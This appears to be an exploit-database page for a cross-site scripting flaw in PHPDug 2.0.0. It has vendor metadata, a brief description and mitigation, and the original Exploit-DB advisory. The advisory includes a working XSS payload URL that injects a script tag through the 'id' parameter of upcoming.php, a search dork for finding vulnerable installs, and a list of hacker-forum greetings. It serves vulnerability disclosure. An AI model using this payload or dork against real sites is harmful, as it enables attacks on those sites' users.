header-logo
Suggest Exploit
vendor:
PHPDug
by:
indoushka
7,5
CVSS
HIGH
Cross Site Scripting
79
CWE
Product Name: PHPDug
Affected Version From: 2.0.0
Affected Version To: 2.0.0
Patch Exists: NO
Related CWE: N/A
CPE: a:phpdug:phpdug:2.0.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux
2008

PHPDug version 2.0.0 Cross Site Scripting Vulnerability

PHPDug version 2.0.0 is vulnerable to Cross Site Scripting (XSS). An attacker can inject malicious JavaScript code into the 'id' parameter of the 'upcoming.php' script. This malicious code will be executed in the browser of the victim when the vulnerable page is accessed.

Mitigation:

Input validation should be used to prevent XSS attacks.
Source

Exploit-DB raw data:

========================================================================================                  
| # Title    : PHPDug version 2.0.0 Cross Site Scripting Vulnerability                    
| # Author   : indoushka                                                               
| # email    : indoushka@hotmail.com                                                   
| # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)                                                                     
| # Total alerts found : 1                                                
|                High  : 1                                                                       
|              Medium  :                                                                        
|                  Low :                                                                            
|       Informational  :                                                             
| # Web Site : www.iq-ty.com                                                                                                                                   
| # Dork     : Powered By PHPDug version 2.0.0                                  
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       
| # Bug      : XSS                                                                     
======================      Exploit By indoushka       =================================
 # Exploit  : 
 
 1- XSS

http://127.0.0.1/phpdug/upcoming.php?id=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>

================================   Dz-Ghost Team   ========================================
Greetz : Exploit-db Team (loneferret+Exploits+dookie2000ca)
all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 * www.hackteach.org
Rafik (Tinjah.com) * Yashar (sc0rpion.ir) * Silitoad * redda * mourad (dgsn.dz) * www.cyber-mirror.org
www.albasrah-forums.com * www.amman-dj.com * www.forums.ibb7.com * www.maker-sat.com * www.owned-m.com
www.vb.7lanet.com * www.3kalam.com * Stake (v4-team.com) * www.3kalam.com * www.dev-chat.com  
www.al7ra.com * Cyb3r IntRue (avengers team) * www.securityreason.com * www.packetstormsecurity.org
www.sazcart.com * www.best-sec.net * www.app.feeddigest.com * www.forum.brg8.com * www.zone-h.net
www.m-y.cc * www.hacker.ps * no-exploit.com * www.bug-blog.de * www.gem-flash.com * www.soqor.org
www.h4ckf0ru.com * www.bawassil.com * www.host4ll.com * www.hacker-top.com * www.xp10.me 
www.forums.soqor.net * www.alkrsan.net * blackc0der (www.forum.aria-security.com)  
SoldierOfAllah (www.m4r0c-s3curity.cc)www.arhack.net * www.google.com * www.np-alm7bh.com 
www.lyloo59.skyrock.com * www.sec-eviles.com * www.snakespc.com * www.kadmiwe.net * www.syrcafe.com 
www.mriraq.com * www.dzh4cker.l9l.org * www.goyelang.cn * www.h-t.cc * www.arabic-m.com * www.74ck3r.com 
r1z (www.sec-r1z.com) * omanroot.com * www.bdr130.net * www.zac003.persiangig.ir * www.0xblackhat.ir
www.mormoroth.net * www.securitywall.org * www.sec-code.com *
-------------------------------------------------------------------------------------------

Navigation

Suggest Exploit

Services By CQR